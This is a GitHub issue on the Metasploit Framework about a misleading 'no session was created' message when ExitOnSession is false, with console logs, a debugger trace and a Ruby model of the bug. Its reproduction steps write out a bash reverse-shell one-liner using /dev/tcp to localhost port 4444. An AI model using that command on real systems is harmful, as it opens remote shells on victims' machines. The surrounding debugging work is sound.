rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Error message (`no session`) printed when `ExitOnSession` is set to `false` even though a session was actually created #10114

Open WangYihang opened 6 years ago

WangYihang commented 6 years ago

Steps to reproduce

I found this problem while working on my GSoC project; I will try to fix it as best I can. Here are the steps to reproduce:

Attacker side

  1. ./msfconsole
  2. use multi/handler
  3. set payload cmd/unix/reverse_bash;
  4. set LHOST 127.0.0.1;
  5. set LPORT 4444;
  6. set ExitOnSession false;
  7. exploit

Victim side

Open two terminals and create two reverse shell sessions

  1. bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
  2. bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'

Expected behavior

msf5 exploit(multi/handler) > run
"[DEBUG]: Running meterpreter shell commands run([])"

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:60964) at 2018-05-30 23:24:52 +0800
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, ***********2 sessions were created.***********

msf5 exploit(multi/handler) > sessions
"[DEBUG]: Running meterpreter shell commands sessions([])"

Active sessions
===============

  Id  Name  Type            Information                                          Connection
  --  ----  ----            -----------                                          ----------
  1         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:58000 (127.0.0.1)
  2         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:60964 (127.0.0.1)

Current behavior

The difference between the expected behavior and the current behavior is marked with stars (***********)

msf5 exploit(multi/handler) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:60964) at 2018-05-30 23:24:52 +0800
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, ***********but no session was created.***********

msf5 exploit(multi/handler) > sessions
"[DEBUG]: Running meterpreter shell commands sessions([])"

Active sessions
===============

  Id  Name  Type            Information                                          Connection
  --  ----  ----            -----------                                          ----------
  1         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:58000 (127.0.0.1)
  2         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:60964 (127.0.0.1)

System stuff

Metasploit version

Framework: 5.0.0-dev-a6279e8396
Console  : 5.0.0-dev-a6279e8396

I installed Metasploit with:

OS

Ubuntu 18.10

WangYihang commented 6 years ago

In addition, after debugging I noticed that only when ExitOnSession is set to false is the return value of the function exploit_simple (lib/msf/base/simple/exploit.rb:59) nil.

Debug log

[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:42402) at 2018-05-31 10:05:45 +0800
[*] Command shell session 3 opened (127.0.0.1:4444 -> 127.0.0.1:42404) at 2018-05-31 10:05:54 +0800
^C[-] Exploit failed: Interrupt
"[Debug]: Exploit finished! Session: "

From: /home/sun/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb @ line 123 Msf::Ui::Console::CommandDispatcher::Exploit#cmd_exploit:

    118:         'OptionStr'      => opt_str,
    119:         'LocalInput'     => driver.input,
    120:         'LocalOutput'    => driver.output,
    121:         'RunAsJob'       => jobify)
    122:       p "[Debug]: Exploit finished! Session: #{session}"
 => 123:       binding.pry
    124:     rescue ::Interrupt
    125:       raise $!
    126:     rescue ::Exception => e
    127:       print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
    128:       if(e.class.to_s != 'Msf::OptionValidateError')

[1] pry(#<Msf::Ui::Console::CommandDispatcher::Exploit>)> session
=> nil
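
The following is an added illustration, not Metasploit's own code, of why the console ends up printing "no session was created" here. With ExitOnSession true the handler returns the first session it opens, and the console's completion message keys off that single return value; with ExitOnSession false the handler keeps listening until the operator interrupts it, so the run returns nil even though sessions were opened along the way. The `ToyHandler` class, the event list, and the `current_message`/`proposed_message` helpers are hypothetical stand-ins for the handler loop and the console's message logic; the connection strings are constructed sample input.

```ruby
# Added illustration (not Metasploit code): how a handler run can open
# sessions and still return nil, and how counting the sessions opened
# during the run gives a truthful completion message.

# Minimal model of a multi/handler listener. Each string in `events`
# stands in for a victim connecting while the handler is running;
# :interrupt stands in for the operator pressing Ctrl-C.
class ToyHandler
  attr_reader :sessions

  def initialize(exit_on_session:)
    @exit_on_session = exit_on_session
    @sessions = [] # sessions opened during this run, in order
  end

  # ExitOnSession true: return the first session (what the console expects).
  # ExitOnSession false: keep accepting until interrupted, then return nil,
  # which mirrors the nil return value observed in the debug log above.
  def run(events)
    events.each do |ev|
      return nil if ev == :interrupt
      @sessions << { id: @sessions.size + 1, peer: ev }
      return @sessions.last if @exit_on_session
    end
    nil
  end
end

# Message derived only from the single return value (the current behaviour).
def current_message(session)
  if session
    "Exploit completed, session #{session[:id]} created."
  else
    "Exploit completed, but no session was created."
  end
end

# Message derived from the sessions the handler actually opened, so an
# interrupted ExitOnSession=false run still reports what it produced.
def proposed_message(session, opened)
  return "Exploit completed, session #{session[:id]} created." if session
  return "Exploit completed, but no session was created." if opened.empty?
  "Exploit completed, #{opened.size} session(s) were created."
end

# Run the toy handler and return everything a caller might want to inspect.
def simulate(exit_on_session:, events:)
  handler = ToyHandler.new(exit_on_session: exit_on_session)
  session = handler.run(events)
  {
    returned: session,
    opened:   handler.sessions,
    current:  current_message(session),
    proposed: proposed_message(session, handler.sessions)
  }
end

if __FILE__ == $0
  # Constructed sample: two victims connect, then the operator hits Ctrl-C.
  events = ['127.0.0.1:58000', '127.0.0.1:60964', :interrupt]
  puts simulate(exit_on_session: true,  events: events)[:current]
  puts simulate(exit_on_session: false, events: events)[:current]
  puts simulate(exit_on_session: false, events: events)[:proposed]
end
```

With the sample events, the ExitOnSession=false run returns nil while having opened two sessions, so the return-value-only message says no session was created and the count-based message says two were.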
busterb commented 6 years ago

This module is not a real exploit, and as such, has no actual success criteria. But we could probably fake it.

WangYihang commented 6 years ago

Thank you for the reply~ I know that it is not a real exploit, but the session was actually created... so in my mind, the framework should tell the user that N sessions were created while listening on the port~ Here is my thinking: I think we can just send a specific command (such as `echo '#{random_string}'`) which can run on multiple platforms (it seems like the function run_cmd_token does this), then if the client echoes that string, we can tell that the exploit was successful... I am not sure whether it will work or not...

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.